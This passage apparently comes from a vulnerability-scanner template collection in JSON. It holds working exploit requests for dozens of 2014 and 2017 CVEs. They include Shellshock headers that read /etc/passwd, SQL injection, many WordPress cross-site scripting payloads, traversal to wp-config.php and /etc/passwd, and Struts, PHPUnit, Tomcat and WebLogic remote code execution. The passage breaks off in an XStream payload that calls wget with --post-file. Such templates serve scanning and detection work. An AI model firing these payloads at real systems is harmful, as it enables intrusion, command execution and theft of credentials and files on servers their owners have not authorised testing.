Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["","/cgi-bin/status","/cgi-bin/stats","/cgi-bin/test","/cgi-bin/status/status.cgi","/test.cgi","/debug.cgi","/cgi-bin/test-cgi","/cgi-bin/test.cgi"]},"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/movies/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Movies =","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["ActiveHelper LiveHelp Live Chat"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Search public registries"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Video Gallery WordPress DZS"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/swipehq-payment-gateway-woocommerce/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Infusionsoft","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18518","info":{"name":"SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"SMTP by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18505","info":{"name":"BestWebSoft's Twitter < 2.55 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Twitter Button by\")"],"condition":"and"}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18493","info":{"name":"Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Admin Page by\")"],"condition":"and"}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18496","info":{"name":"Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Htaccess by\")"],"condition":"and"}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["JBoss","ClassCastException"],"condition":"and","case-insensitive":true},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Amty Thumb","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-18556","info":{"name":"Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Analytics by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18501","info":{"name":"Social Login by BestWebSoft < 0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Login by\")"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5638","info":{"name":"Apache Struts 2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#cmd=\"cat /etc/passwd\",#cmds={\"/bin/bash\",\"-c\",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#rw=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#rw.println(#e),#rw.flush())}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        